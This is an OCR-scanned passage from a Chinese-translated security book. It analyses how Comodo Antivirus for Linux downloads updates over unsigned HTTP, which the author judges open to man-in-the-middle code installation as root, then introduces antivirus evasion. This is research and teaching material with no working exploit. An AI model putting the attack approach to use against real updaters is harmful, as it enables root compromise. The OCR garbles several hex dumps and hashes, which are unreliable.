Windows 平 台 。 许 多 Unix 版 本 的 反 病 毒 产品 并 没有 对 可 执行 的 ELF 或 MachO 文 件 或 用 于 启动 反 病 
毒 后 台 常 驻 进 程 的 Shell 脚 本 应 用 签名 技术 。 也 有 一 些 例外 ， 但 它们 只 是 例外 。 



























































提示 在 Windows 操 作 平 台 上 ， 给 可 执行 程序 添加 数字 签名 十 分 常见 。 给 Shell 脚 本 添加 数字 签 
名 听 起 来 有 点 奇怪 ， 但 在 Unix 类 的 平台 上 ，Shell 脚 本 就 是 一 个 可 执行 程序 ， 类 似 于 
Windows 平 台 上 的 *.VBS。 正 因 如 此 ， 脚 本 也 需要 和 可 执行 程序 一 样 ， 被 加 上 数字 签名 。 
反 病 毒 厂 商 通 常会 以 注释 的 形式 在 脚本 文件 的 末尾 增加 一 行 带 有 文件 内 所 有 脚本 信息 的 
RSA 签 名 (不 包括 文件 未 尾 的 签名 行 )。 对 于 二 进 制 文件 来 说 ， 通 常会 在 文件 尾部 以 履 盖 
数据 的 形式 添加 。 这 种 操作 不 会 引起 二 进 制 文件 执行 异常 ， 因 为 程序 在 运行 读 取 二 进 制 
文件 的 过 程 中 会 忽略 掉 在 尾部 的 签名 数据 。Windows 支 持 通过 Microsoft Authenticode 对 二 
进 制 文件 添加 数字 签名 。 


5.2 剖析 更 新 协议 


本 部 分 将 会 以 Comodo Antivirus for Linux ( version 1.1.268025-1 for AMD64 ) 作为 研究 对 象 ， 
来 探究 真实 的 反 病 毒 软件 更 新 协议 。 为 了 开展 相关 人 研究 , 我 们 需要 一 些 标准 Unix 工 具 ( 如 grep )、 
Wireshark ( Unix 和 Windows 平 台 上 的 网 络 协 议 分 析 串 探 软 件 )、 浏 览 句 以 及 Comodo antivirus， 你 
可 以 从 下 面 这 个 地 址 下 载 Comodo antivirus : https://www.comodo.com/home/internet-security/antivirus- 
for-linux.php。 
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安装 完 所 需要 的 软件 以 后 ， 就 可 以 开展 相关 研究 了 。 反 病毒 软件 可 以 使 用 两 种 不 同 的 更 新 
方式 : 软件 更 新 以 及 特征 库 更 新 。 前 者 是 指 对 扫描 器 、 驱 动 程 序 、GUI 工 具 等 程序 的 更 新 。 后 
者 是 指 对 扫描 和 感染 文件 修复 的 通用 检测 程序 ， 以 及 包括 CRC、MD5 等 的 特征 库 进 行 更 新 。 如 
果 你 运行 Linux 版 本 的 Comodo GUI 工具 ( 使 用 命令 /opt /CoMoDO/cav )， 将 会 看 到 类 似 图 5-1 中 
的 提示 框 。 


























© COMODO Antivirus 


COMODO | Q v 


Antivirus 








Antivirus & Disabled 
The virus database has been updated on Thu Jan 22 17:12:05 2015 


六 othreat(s) detected so far 





jon 
Run Diagnostics 


È scan now 








Mail Gateway @ Stop Email Filter Type: None 


be 

















图 5-1 Comodo Linux 版 本 的 主要 GUI 界 面 


在 主 窗口 中 , 你 将 会 看 到 反 病 毒 特征 库 最 近 一 次 更 新 的 时 间 , 以 及 截至 目前 侦 测 到 的 恶意 软 
件 等 信息 。 当 你 点 击 Antivirus 按 钮 时 ， 将 会 出 现 更 新 病毒 数据 库 的 选项 ， 如 图 5-2 所 示 。 


tT COMODO Antivirus 


comooo UO co 10 t0 19 mem 
E) Run a Scan E Submit Files 


This section allows you to scan your hard Did your Antivirus report suspicious files? You 
drive for malware, viruses and spyware. can submit as many files as you wish to 
COMODO for analysis by using this section. 

















late Vi ase "l Scheduled Scans 


This section allows you to check for the latest This section allows you to modify the 
virus database and download the updates if scheduled virus scanning settings in order to 
any have your PC periodically scanned. 


Quarantined Items g, Scan Profiles 
Use this section to see and manage the Use this section to add/remove new scanning 


threats quarantined by the virus scanner. profiles which are used by the virus scanner 
to determine the objects to be scanned. 


View Antivirus Events w Scanner Settings 


This section allows you to view a record of This section allows you to change the 
the events, alerts and actions taken by the advanced settings that affect how the virus 
virus scanner. scanner works. 














图 $-2 Comodo Linux 版 本 的 GUI 界面 上 提供 了 “更 新 病毒 数据 库 ” 选 项 





74 第 5 章 反 病 毒 软件 的 更 新 系统 





我 们 先 来 研究 一 下 “更 新 病毒 数据 库 ” 选 项 背后 的 更 新 协议 。 在 点 击 这 个 选项 之 前 ,你 需 
先 通过 以 下 指令 打开 Wireshark: 
$ sudo wireshark 


接着 在 主 菜 单 中 点 击 Capture 并 选择 Start。 为 了 让 Wireshark 只 显示 我 们 需要 的 信息 , 可 以 使 用 


HTTP Filter 功 能 。 配 置 完 成 Wireshark 以 后 ， 点 击 更 新 病毒 数据 库 选 项 ， 让 GUI 检查 特征 库 文 件 的 
最 新 更 新 。 不 久 ， 你 将 看 到 类 似 图 5-3 所 示 的 结果 。 


ethl(port 80) [Wireshark 1.6.7 ] 














captured (2240 bits) 


0 74 ea 3a f5 21 ec 74 d4 35 0b 70 93 08 00 45 Ol 
01 0a 56 06 40 00 40 06 1d 29 cO a8 01 12 b2 ff 
52 05 90 61 00 50 f8 Sd 47 b6 c3 fa bd 42 80 18 
00 73 63 39 00 00 01 01 08 0a 13 b6 11 b9 06 a3 
3e bc 47 45 54 20 2f 61 76 2f 75 70 64 61 74 65 
73 35 38 2f 76 65 72 73 69 6f 6e 69 6e 66 6f 2e 
69 6e 69 20 48 54 54 50 2f 31 2e 31 0d 0a 55 73 ini 
65 72 2d 41 67 65 6e 74 3a 20 30 36 33 62 61 66 er-Agent : 063baf 
30 34 35 65 66 62 39 35 39 36 66 38 38 37 66 62 Disc foo5 961887fb 
38 35 37 31 65 39 63 62 32 36 5f 33 31 5f 31 2e — 8571e9cb 26 31 1. 











图 5-3 ”Wireshark 追 踪 并 展示 了 特征 码 库 更 新 检测 的 过 程 


更 新 工具 从 如 下 URL 下 载 : http://download.comodo.com/av/updates58/versioninfo.ini。 
如 果 你 把 文件 下 载 下 来 并 打开 ， 将 会 看 到 如 下 内 容 : 

$ GET http://download.comodo.com/av/updates58/versioninfo.ini 

[VersionInfo] 

MaxAvailVersion-20805 

MaxDiff-150 


MaxBase-20663 
MaxDiffLimit-150 


这 是 一 个 只 有 一 个 部 分 、 包 含 版 本 信息 以 及 四 块 区 域 的 INI 格 式 的 文件 。 目 前 我 们 对 这 四 个 
区 域 一 无 所 知 ， 不 过 你 可 以 猿 出 MaxAvailversion 其 实 是 代表 最 新 的 版 本 号 。 现 在 让 我 们 试 着 
在 Comodo antivirus 的 文件 中 匹配 到 这 四 个 区 域 中 的 信息 。 


$ grep 20805 -r /opt/COMODO/ 
/opt/COMODO/etc/COMODO.xml: «BaseVer»0x00005145 (20805) 
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«/BaseVer» 


使 用 上 面 的 命令 ， 我 们 可 以 在 COMODO.xml 文 件 中 找到 MaxAvailversion 的 数值 。 这 块 信 


息 代 表 着 特征 库 的 最 新 版 本 。 如 果 versioninfo.ini 中 的 值 








比 COMODO.xml 中 的 值 大 , 反 病 毒 程序 就 


会 下 载 相关 和 更新。 接着 上 面 的 操作 ， 更 改 COMODO.xml 中 Basevezt 的 值 为 20804， 让 更 新 程序 下 
载 最 新 的 更 新 (在 这 个 例子 中 ， 你 需要 等 待 新 的 特征 库 下 载 完 成 )。 现 在 ， 如 果 你 点 击 “ 更 新 病 
毒 数 据 库 ”选项 ，Wireshark 将 会 显示 不 同 的 记录 ， 如 图 5-4 所 示 。 





HTTP/Requests 











Topic / Item 
Y HTTP Requests by HTTP Host 








Count |Rate (ms) 
0,000520 


Percent 






* download.comodo.com 9 
[av[updatesS8/versioninfo.ini 
SE UPD END USER 














0,000167 
0,000019 
0 19 
0,000019 







32,1496 
11,1196 








JavjupdatesS8/sigs/updates/BASE UPD END. USER v20807.cav 1 11,1196 
[avjupdatesS8/sigs/updates/BASE UPD END USER v20808.cav 1 0,000019 11,1196 
[avjupdatesS8/sigs/updates/BASE UPD END USER v20809.cav 1 0,000019 11,1196 
Jav[updatesS8/sigs/updates/BASE UPD END USER v20810.cav 1 0,000019 11,1196 
Jav[updatesS8/sigs/updates/BASE UPD END USER v20811.cav 1 0,000019 11,1196 
JavjupdatesS8/sigs/updates/BASE UPD END, USER v20812.cav 1 0,000019 11,1196 
[aviupdatesS8/sigs/updates/BASE UPD END USER v20813.cav 1 0,000019 11,1196 
v cdn.download.comodo.com 9 0,000167 32,14% 
JavjupdatesS8/versioninfo.ini 1 0,000019 11,1196 
[av[updatesS8/sigs/updates/BASE UPD END USER v20806.cav 1 0,000019 11,1196 
[av[updatesS8/sigs/updates/BASE UPD END USER v20807.cav 1 0,000019 11,1196 
JavjupdatesS8/sigs/updates/BASE UPD END USER v20808.cav 1 0,000019 11,1196 
[av[updatesS8/sigs/updates/BASE UPD END USER v20809.cav 1 0,000019 11,1196 
Javjupdates58/sigs/updates/BASE UPD END, USER v20810.cav 1 0,000019 11,1196 
Jav[updatesS8/sigs/updates/BASE UPD END USER v20811.cav 1 0,000019 11,1196 
Jav[updatesS8/sigs/updates/BASE UPD END USER v20812.cav 1 0,000019 11,1196 
[av[updatesS8/sigs/updates/BASE UPD END USER v20813.cav 1 0,000019 11,1196 到 


图 5-4 ”从 Comodo 服 务 器 下 载 更 新 文件 的 网 络 请 求 


到 现在 为 止 ,我 们 已 经 知道 程序 是 如 何 获 取 新 的 特征 库 , 以 及 从 哪里 下 载 了 。 如 果 MaxAvail1- 
Version 在 versioninfo.ini 中 的 值 比 在 COMODO.xml 中 高 ， 程 序 就 会 请 求 如 下 URL: >.cav"> 
http://cdn.download.comodo.com/av/updates58/sigs/updates/BASE UPD END USER v<>.cav。 

使 用 浏览 器 或 其 他 工具 下 载 并 打开 cav 文 件 ， 你 会 看 到 一 个 以 cAvV3 开 头 的 二 进 制 数据 ; 


$ pyew http://cdn.download.comodo.com/av/updates58/sigs/updates/ 
BASE UPD END USER v20806.cav 
000 43 41 56 33 46 51 00 00 
010 43 42 01 00 05 00 00 00 
020 01 00 00 00 42 00 22 00 
030 00 01 00 00 00 00 00 00 
040 00 00 43 42 03 00 05 00 
050 00 00 01 00 00 00 42 00 
060 00 00 00 06 00 00 00 00 
070 00 6A 2C CC AC 00 22 00 
080 00 01 00 00 00 00 00 00 
090 00 00 43 42 06 00 OD 00 
0A0 00 00 01 00 00 00 43 00 
0BO 22 00 00 43 42 20 01 A8 

















52 
01 
00 
00 
00 
22 
00 
00 
00 
00 
00 
1F 


9A 
00 
43 
01 
00 
00 
00 
43 
01 
00 
00 
20 


E9 
00 
42 
00 
01 
00 
00 
42 
00 
09 
20 
00 


54 
00 
02 
00 
00 
43 
02 
05 
00 
00 
00 
A8 


44 
00 
00 
00 
00 
42 
00 
00 
00 
00 
00 
1F 


92 
00 
05 
42 
00 
04 
00 
05 
42 
00 
00 
20 


95 
00 
00 
00 
00 
00 
00 
00 
00 
00 
00 
00 
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0c000000 00. 46~05 890. 00 00-00 00- g0 0000 00.000 00 ...F........... 
000000000000 0000000000 0000 0000 0000 00 ............ 


该 二 进 制 文件 的 内 容 看 起 来 应 该 是 Comodo antivirus 的 特征 库 。 最 新 特征 库 版 本 是 20806 
(2015 年 1 月 23 日 )。 下面 让 我 们 查看 一 下 该 特征 库 是 否 是 最 新 版 本 : 


$ HEAD http://cdn.download.comodo.com/av/updates58/sigs/updates/ 
BASE UPD END USER v20813.cav 

200 OK 
Connection: close 

Date: Fri, 23 Jan 2015 08:52:48 GMT 
(22) 


























$ HEAD http://cdn.download.comodo.com/av/updates58/sigs/updates/ 
BASE UPD END USER v20814.cav 

200 OK 
Connection: close 

Date: Fri, 23 Jan 2015 08:52:52 GMT 
(oe 





$ HEAD http://cdn.download.comodo.com/av/updates58/sigs/updates/ 
BASE UPD END USER, v20815.cav 

404 Not Found 

Connection: close 

Date: Fri, 23 Jan 2015 08:52:54 GMT 

(vs) 


看 起 来 服务 器 上 有 更 新 的 BASE_UPD_END_USER 文 件 ( 版 本 号 是 20815 ), 但 是 出 于 某 些 原因 , 
程序 只 能 更 新 到 20806 版 本 。 这 有 可 能 是 因为 20815 这 个 版 本 仍然 是 测试 版 本 (不 稳定 的 特征 库 )， 
只 对 一 些 有 查 杀 某 类 病毒 需求 的 顾客 开放 。 也 有 可 能 是 因为 刚刚 更 新 的 时 候 请 求 的 versioninfo.ini 
文件 没有 被 及 时 更 新 。 到 底 是 什么 原因 暂时 无 法 准确 了 解 ， 但 至 少 我 们 知道 了 以 下 两 点 信息 : 

口 反 病毒 软件 获取 特征 库 新 版 本 信息 的 方式 ; 
口 获取 远程 更 新 文件 的 来 源 。 

截至 目前 , 我 们 仍然 不 能 完全 了 解 反 病毒 软件 是 如 何 更 新 的 ， 只 是 知道 了 特征 库 是 怎么 更 新 
的 。 让 我 们 回 到 Comodo antivirus GUI 上 来 ， 点 击 More 按 钮 ， 会 找到 Check for Updates 选 项 。 打 开 
一 个 新 的 Wireshark 抓 包 窗口 ,按照 刚 刚 的 操作 捕获 网 络 流量 。 不 一 会 儿 , 反 病 毒 软件 就 会 提示 你 
有 最 新 版 本 ， 并 可 以 通过 Wireshark 的 抓 包 记录 来 判断 有 无 更 新 版 本 ( 如 图 5-5 所 示 )。 

































































HTTP/Requests SIE 
Topic / Item [count Rate (ms) | Percent | 
Y HTTP Requests by HTTP Host 2 0,013195 

v download.comodo.com 1 0,006597 50,0096 

Icavmgl/download/updates/release/inis 1800/cavmgl update x64.xml 1 0,006597 100,00% 

v cdn.download.comodo.corn 1 0,006597 50,0096 

Icavmgl/download/updates/release/inis 1800/cavmgl update x64.xml 1 0,006597 100,00% 








图 5-5 ”Wireshark 追 踪 记 录 的 程序 检测 最 新 Comodo 产 品 文件 网 络 的 请 求 
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Wireshark 的 记录 显示 ,， 反 病毒 软件 从 以 下 地 址 下 载 了 文件 : http:///cdn.download.comodo.com/ 
cavmgl/download/updates/release/inis 1800/cavmgl update x64.xml. 


在 浏览 器 中 打开 这 个 XML 文件 (如 图 $-6 所 示 )。 








€ Œ | D cdn.download.comodo.com/cavmgl/download/updates/release/inis 1800/cavmgl update x64.xml 
This XML file does not appear to have any style information associated with it. The document tree is shown below. 


v«cavmgl updates» 
v<file name-"libSCRIPT.so" size-"1310916" sha-"BBD369A115ADB6551286C7D63687541573592D3D" src-"x64/libSCRIPT.so"» 
w«put base-"CSIDL APPLICATION" folder-"scanners" perm-"33188" requireReboot-"true"» 
v«copies» 
«copy folder-"repair"/» 
«/copies» 
«/put» 
</file> 
v<file name-"libUNARCH.so" size-"6091555" sha="4FDCD69770CBA914C8E999C793832FC7ADC63F5C" src="x64/libUNARCH.so"> 
v<put base-"CSIDL APPLICATION" folder-"scanners" perm="33188" requireReboot="true"> 
v«copies» 
«copy folder-"repair"/» 
«/copies» 
</put> 
</file> 
v<file name-"cmdmgd" size-"4099" sha="BF300B443B03E673CD08ED7B1636D219E0D66699" src="x64/cmdmgd"> 
v<put base-"CSIDL INITRC" perm="33261" requireReboot="true"> 
v<copies> 
<copy folder="repair"/> 





</copies> 
</put> 
</file> 
v<file name-"cavscan greek.qm" size="8663" sha-"970F76494DE5E0D3F3824979088F793573F9250B" src="x64/cavscan_greek.qm"> 
v<put base-"CSIDL APPLICATION" folder-"translations" perm-"33188" requireReboot="true"> 
v«copies» 
«copy folder-"repair"/» 
«/copies» 
«/put» 
</file> 




















图 5-6 ”用 于 更 新 Codomo 反 病毒 软件 Linux 版 的 XML 文件 


cavmgl_updates 标 签 包 含 了 各 类 XML 标签 。 每 个 XML 标签 都 包含 了 更 新 文件 的 文件 名 、 
大 小 、SHA1 散 列 值 ， 以 及 下 载 文件 的 URL ( 即 src 属 性 的 值 )。 此 外 ， 还 有 要 将 更 新 文件 复制 到 
哪里 («copy folder="repair">), 更 新 完成 以 后 是 否 要 重启 。 让 我 们 选择 libSCRIPT.so， 然 
后 在 安装 目录 下 校 验 一 下 它 的 SHA1 散 列 值 : 


$ shalsum /opt/COMODO/repair/libSCRIPT.so 
bbd369a115adb6551286c7463687541573592d83d repair/libSCRIPT.so 


SHA1 散 列 值 一 致 , 可 以 推测 出 文件 还 无 须 更 新 。 继续 校 验 其 他 文件 的 SHA1 散 列 值 并 与 XML 
文件 中 对 应 的 散 列 值 进行 对 比 ， 会 发 现 所 有 散 列 值 与 安装 的 文件 都 一 致 。 让 我 们 在 libSCRIPT.so 
中 加 入 一 个 字 市 : 

# cp libSCRIPT.so libSCRIPT.so-orig 

# echo A >> libSCRIPT.so 


# shalsum libSCRIPT.so 
15£c2983832f£3f£346dcad45edb20ad20e65031f0e  libSCRIPT.so 


现在 再 次 点 击 Check for Updates， 什 么 都 没有 发 生 。 我 们 需要 做 一 些 其 他 的 改动 。 如 果 你 在 
COMODO 的 安装 目录 下 搜索 libSCRIPT.so， 会 发 现 以 下 结 


# find /opt/COMODO/ -name "libSCRIPT.so" 
/opt/COMODO/repair/libSCRIPT.so 
/opt/COMODO/repair/scanners/libSCRIPT.so 
/opt/COMODO/scanners/libSCRIPT.so 
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我 们 需要 替换 更 多 的 libSCRIPT.so 文 件 。 更 新 文件 的 更 新 逻辑 应 该 是 ， 同 步 更 新 所 有 的 
libSCRIPT.so 文 件 。 然 而 ， 你 不 是 通过 GUI 工 具 来 更 新 文件 ， 而 是 手动 蔡 换 的 。 使 用 下 面 的 命令 
替换 目录 下 的 所 有 libSCRIPT.so: 


# cp /opt/COMODO/repair/libSCRIPT.so /opt/COMODO/repair/scanners/ 
# cp /opt/COMODO/repair/libSCRIPT.so /opt/COMODO/scanners/ 


现在 回 到 Wireshark 里 面 ， 创 建 一 个 新 抓 包 窗口 。 然 后 回 到 Comodo 的 界面 中 ， 点 击 Check for 
Updates， 现 在 程序 提示 有 新 的 更 新 需要 下 载 。 如 果 点 击 Continue 按 钮 ， 等 待 更 新 任务 完成 ， 就 会 
下 载 libSCRIPT.so 文 件 。 在 Wireshark 中 会 看 到 如 图 $-7 所 示 的 信息 。 


























1 Follow TCP Stream 
Stream Content 








GET /cavmgl/download/updates/release/inis_1800/x64/libSCRIPT.so HTTP/1.1 
User-Agent: 063baf045efb9596f887fb8571e9cb26_31_1.1.268025.1_23 

Cookie: _ cfduid-dal5b7f86b5a86cbdf7fcffc0688ef62f1422004871 
Connection: Keep-Alive 


Host: cdn. download. comodo. com 


HTTP/1.1 200 OK 
Date: Fri, 23 Jan 2015 09:21:16 GMT 
Content-Type: application/octet-stream 


Last-Modified: Tue, 26 Feb 2013 09:00:35 GMT 
-CCACDH-Mirror-ID: h6edcgdown3 


Server: cloudflare-nginx 
CF-RAY: 1ad2eb903e641043-CDG 


Entire conversation (1320826 bytes) - | 


Qsuscar | Œ Guardar como | imprimir |C Ascu C EBCDIC C HexDump C CArrays (* Raw 
[&| Ayuda | [Y]Filter Out This Stream | xcerr | 

















图 5-7 追踪 下 载 libSCRIPT.so 模 块 的 网 络 请 求 





现在 我 们 已 经 完成 了 针对 更 新 协议 所 有 的 分 析 步 又 。 因 为 刚才 在 分 析 过 程 中 发 现 了 漏洞 , 所 
以 接 下 来 要 编写 一 个 针对 更 新 协议 的 漏洞 利用 程序 。 
口 所 有 更 新 都 通过 HTTP 协 议 下 载 。 
口 程序 通过 加 密 散 列 值 判 断 下 载 文件 的 完整 性 ， 没 有 签名 认证 文件 是 否 是 Comodo 的 官方 
文件 。 
口 目录 文件 没有 做 签名 保护 ， 也 没有 做 特征 认证 。 

基于 上 面 这 些 更 新 过 程 中 的 缺陷 , 如 果 你 能 在 局 域 网 内 通过 中 间 人 劫持 发 起 攻击 ,就 可 以 更 
改 更 新 内 容 ， 然 后 让 反 病 毒 软件 安装 任意 程序 (只 要 编写 XML 目录 文件 格式 的 漏洞 利用 程序 )。 
另外 ， 通 过 利用 这 个 漏洞 ,我们 可 以 使 用 root 权 限 在 任意 位 置 安装 恶意 程序 。 
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5.3 ”错误 的 保护 


一 些 反 病 毒 软件 吹 喊 自己 可 以 检测 使 用 SSL/TLS 加 密 过 的 HTTPS 协 议 。 言 外 之 意 就 是 , 反 病 
毒 软件 采用 和 病毒 一 样 的 方法 来 探测 用 户 的 网 络 请 求 ， 因 为 一 般 来 讲 ，SSL/TLS 加 密 过 的 网 络 流 
量 是 无 法 被 检测 的 。2015 年 4 月 ，Hanno B6ck 发 布 了 一 篇 关于 分 析 反 病毒 软件 检测 TLS 流 量 的 博 
客 文 章 ( https://blog.hboeck.de/archives/869-How-Kasperskymakes-you-vulnerable-to-the-FREAK- 
attack-and-other-ways-Antivirussoftware-lowers-your-H TTPS-security.html )。 

文章 中 提 到 ， 如 果 反 病 毒 软 件 要 检测 TLS 加 密 过 的 网 络 流量 ， 就 需要 进行 MITM 攻 击 操作 ， 
针对 指定 域名 ( 如 *.google.com ) 安装 证 书 颁 发 机 构 发 布 的 可 信 证 书 ， 或 者 为 用 户 访问 的 每 个 
站 点 分 配 新 的 合法 证 书 。 反 病毒 软件 、 诸 如 Superfish 或 PrivDog 这 样 的 合法 软件 ， 以 及 恶意 软 
件 都 会 安装 新 的 根 证 书 完成 相关 操作 。 对 于 反 病 毒 软 件 ， 这 么 做 事实 上 降低 了 计算 机 受 保 护 的 
级 别 。 

该 博客 文章 还 提 到 , 诸如 卡巴 斯 基 、Avast 和 ESET 等 许多 反 病 毒 软件 产品 都 会 强制 默认 开启 ， 
使 用 上 述 技术 检测 用 户 HTTPS 流 量 的 网 络 保护 功能 。 这 会 导致 TLS 协 议 出 现 不 少 问题 。 比 如 ， 所 
有 的 软件 可 以 使 用 TLS 检 验 技术 突破 HTTP 公 共 密 钥 保 护 。 这 项 技术 允许 页 面 将 数字 签名 证 书 的 
公 钥 与 浏览 器 绑 定 。 之 后 再 访问 这 个 页 面 的 时 候 , 浏览 器 只 会 放行 带 有 对 应 公 钥 证 书 的 页 面 。 这 
项 用 来 防范 由 伪造 或 不 正当 手段 获得 网 站 证 书 造成 的 中 间 人 攻击 的 措施 被 反 病 毒 软件 的 流 谍 证 
书 打破 了 。 

这 还 不 是 最 糟糕 的 ,一些 类 似 卡巴 斯 基 所 使 用 的 TLS 流 量 拦 截 功能 将 用 户 暴 露 在 一 系列 已 经 
在 TLS 中 修复 的 漏洞 的 威胁 之 下 ， 比 如 CRIME 和 FREAK 等 。 另外，Avast 和 卡巴 斯 基 都 接受 8 位 不 
合理 的 Diffie Hellman 密 钥 交 换 (一 种 确保 共享 KEY 安 全 穿越 不 安全 网 络 的 方法 )。 更 糟糕 的 是 ， 
如 果 这 些 产品 通过 TLS 从 自己 的 服务 器 上 下 载 更 新 文件 ， 这 类 TLS 流 量 拦截 功能 也 会 削弱 反 病 毒 
软件 自身 的 保护 。 

从 防护 角度 来 说 ， 这 些 TLS 流 量 拦截 功能 是 无 法 接受 的 ， 男 一 方面 ， 这 也 会 让 攻击 者 更 容易 
写 出 漏洞 利用 程序 一 一 反 病 毒 软件 的 设计 缺陷 允许 攻击 者 在 系统 安装 了 所 有 补丁 的 情况 下 不 使 
用 浏览 器 完成 许多 其 他 攻击 。 







































































































































































5.4 总 结 


本 章 涵盖 了 有 关 升 级 服务 的 各 种 话题 ， 比 如 ， 现 代 反 病毒 软件 是 如 何 进行 更 新 的 ,使 用 的 是 
什么 更 新 协议 ， 以 及 错误 和 不 安全 的 更 新 方式 带 来 的 安全 短 板 。 
O 更 新 文件 包 ” 仅 更 新 所 需 部 分 文件 ， 并 且 尽 可 能 少 地 使 用 网 络 传输 ， 这 一 点 很 重要 。 因 
为 反 病 毒 软件 更 新 的 时 候 常 会 用 到 目录 文件 ， 这 类 文件 中 会 包含 需要 更 新 的 文件 、 对 应 
的 散 列 值 ， 以 及 更 新 过 程 中 需要 用 到 的 元 数据 等 信息 。 
OQ 传输 协议 ”使 用 类 似 HITP 这 样 不 安全 的 传输 通道 ， 为 MITM 等 攻击 敞开 了 方便 之 门 。 此 
外 ， 使 用 加 密 过 的 传输 协议 其 实 也 远 远 不 够 。 
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OQ 针对 更 新 文件 的 完整 性 检查 ”使 用 未 加 密 的 渠道 发 放 更 新 ， 但 在 本 地 进行 文件 完整 性 检 
查 是 可 行 的 。 但 是 ， 如 果 反 过 来 就 不 正确 了 : 缺乏 文件 完整 性 检查 的 安全 更 新 渠道 ， 如 
HTTP， 几 乎 没有 什么 用 人 处。 
O 不 安全 的 更 新 服务 是 公开 的 秘密 ”深入 探究 商业 反 病 毒 软件 的 工作 流程 ， 我 们 会 发 现 它 
们 的 更 新 流程 并 非 滴水 不 漏 。 事 实证 明 ， 部 分 软件 的 更 新 服务 存在 漏洞 ， 包 括 使 用 未 经 
加 密 的 HTTP 协 议 下 载 包含 更 新 文件 列表 及 其 对 应 散 列 值 的 目录 文件 。 可 能 有 人 认为 这 是 
一 种 保护 ,但 是 其 缺点 是 校 验 目录 文件 没有 经 过 验证 ， 这 就 使 得 攻击 者 可 以 通过 修改 过 
的 目录 文件 以 及 散 列 值 完 成 攻击 。 
本 章 最 后 讨论 了 装机 量 大 的 反 病 毒 软件 中 的 HTTPS 流 量 拦 截 功能 , 事实 上 这 些 拦截 功能 打破 
了 HTTPS 证 书 固定 保护 ， 给 用 户 带 来 了 额外 的 风险 。 
这 是 本 书 第 一 部 分 的 最 后 一 章 。 至 此 , 我 们 对 所 有 重要 的 基础 知识 都 作 了 详细 的 介绍 。 在 本 
书 第 二 部 分 ， 我 们 将 讨论 第 一 部 分 中 提 到 过 的 如 何 绕 过 反 病 毒 软件 各 个 部 分 的 查 杀 和 保护 。 
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为 了 能 够 绕 过 一 款 或 多 款 反 病 毒 软 件 , 病毒 作者 、 渗 透 测 试 者 以 及 病毒 研究 者 会 使 用 一 些 绕 
过 反 病 毒 软件 的 技术 。 这样 可 以 确保 攻击 者 需要 执行 的 攻击 代码 不 被 反 病 毒 软件 阻 断 , 并 成 功 完 
成 相关 攻击 操作 。 

绕 过 反 病 毒 软件 的 技术 可 以 分 为 两 大 类 : 动态 和 静态 。 简 单 来 说 , 静态 绕 过 是 指 绕 过 反 病毒 
软件 基于 特征 码 的 检测 算法 , 而 动态 绕 过 是 指 绕 过 反 病 毒 软件 针对 样本 文件 行为 进行 的 拦截 。 也 
就 是 说 , 在 静态 层面 绕 过 反 病毒 软件 就 是 通过 更 改 样 本 文件 中 的 二 进 制 数 据 , 绕 过 基于 CRC 校 验 
码 算法 、 模 糊 散 列 或 加 密 散 列 ; 或 者 更 改 样本 文件 的 程序 图 , 绕 过 基于 简单 区 块 和 功能 的 特征 码 
查 杀 。 在 动态 层面 绕 过 反 病毒 软件 则 需要 病毒 样本 在 执行 过 程 中 发 现 当前 执行 环境 是 沙 盒 或 反 病 
毒 模 拟 需 后 , 立即 变更 执行 行为 ， 或 者 调用 反 病 毒 模 拟 需 不 支持 的 指令 。 它 也 可 以 设法 逃逸 出 反 
病毒 软件 设置 的 沙 盒 或 “安全 隔离 ”环境 ,使 其 恶意 行为 摆脱 反 病 毒 软件 的 监控 。 

因此 , 你 可 以 使 用 多 种 技术 来 绕 过 反 病 毒 软件 的 检测 。 一 些 技术 将 会 在 接 下 来 的 几 节 中 详 述 ， 
但 首先 让 我 们 来 简单 了 解 一 下 反 病 毒 绕 过 技术 的 艺术 。 


6.1 ” 谁 会 使 用 反 病 毒 软件 的 绕 过 技术 


绕 过 反 病 毒 软件 的 技术 是 一 个 颇 有 争议 的 话题 。 我 们 经 常 能 听 到 或 看 到 一 些 疑 问 : 如 果 不 是 
为 了 做 坏事 , 为 什么 有 人 想 要 绕 过 反 病毒 软 件 ? 绕 过 反 病 毒 软件 不 是 只 有 “坏人 ” 才 会 做 的 事情 
吗 ? RK, 除了 病毒 作者 会 使 用 相关 技术 绕 过 反 病 毒 软件 的 侦 测 并 开展 破坏 ， 在 渗透 测试 领域 ， 
合法 的 安全 技术 专家 也 会 使 用 相关 技术 来 绕 过 反 病 毒 软件 。 受 雇 于 某 些 公 司 开展 渗透 测试 的 安全 
专家 有 时 为 了 能 绕 过 安装 在 目标 机 顺 上 的 终端 软件 的 防护 技术 , 也 需要 用 到 相关 绕 过 技术 。 比如 ， 
在 渗透 评估 过 程 中 ， 使 用 Meterpreter 利 用 程序 。 另 外 ， 反 病毒 软件 绕 过 技术 也 能 用 来 测试 公司 组 
织 部 署 的 反 病 毒 防 护 方 案 。 安 全 专家 会 使 用 反 病 毒 软件 来 回答 下 列 问题 。 

口 能 否 轻易 绕 过 动态 防护 检测 ? 
口 能 否 使 用 近期 或 特定 的 病毒 样本 , 通过 修改 样本 中 一 小 部 分 数据 , 来 绕 过 静态 侦 测 技术 ? 

弄 清楚 上 面 这 些 问 题 有 助 于 组 织 机 构 保护 自己 免 受 恶意 攻击 ,一 般 的 组 织 机 构 会 使 用 基于 静 
态 或 动态 的 防护 系统 侦 测 已 知 或 未 知 的 恶意 软件 ( 通过 文件 可 信 系 统 或 监控 程序 执行 过 程 来 决定 
程序 行为 是 否 可 疑 )。 但 是 通常 来 说 ， 绕 过 反 病 毒 软件 的 侦 测 可 谓 小 菜 一 矶 。 要 绕 过 多 款 反 病毒 
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软件 ， 往 往 只 需要 花费 几 分 钟 或 几 个 小 时 。 

2008 年 ， 在 拉 斯 维 加 斯 举办 的 DefCon 大 会 上 ， 进 行 了 一 场 名 叫 Race to Zero 的 反 病 毒 软件 绕 
过 竞赛 。 比赛 过 程 中 , 组 委 会 分 配给 参赛 者 一 组 病毒 样本 进行 修改 并 通过 竞赛 平台 上 传 恶意 代码 。 
参赛 者 上 传 修改 过 的 样本 以 后 , 竞赛 平台 会 使 用 反 病 毒 扫描 器 检测 修改 过 的 样本 能 和 否 被 侦 测 , 是 
被 什么 反 病 毒 软 件 检测 到 的 。 首先 使 用 修改 过 的 病毒 样本 绕 过 所 有 反 病 毒 软件 的 个 人 或 团体 即 可 
赢得 比赛 。 比 赛 的 每 一 轮 都 会 变 得 更 难 、 更 具 挑战 性 。 比 赛 的 最 终结 果 是 ， 所 有 的 反 病 毒 软 件 都 
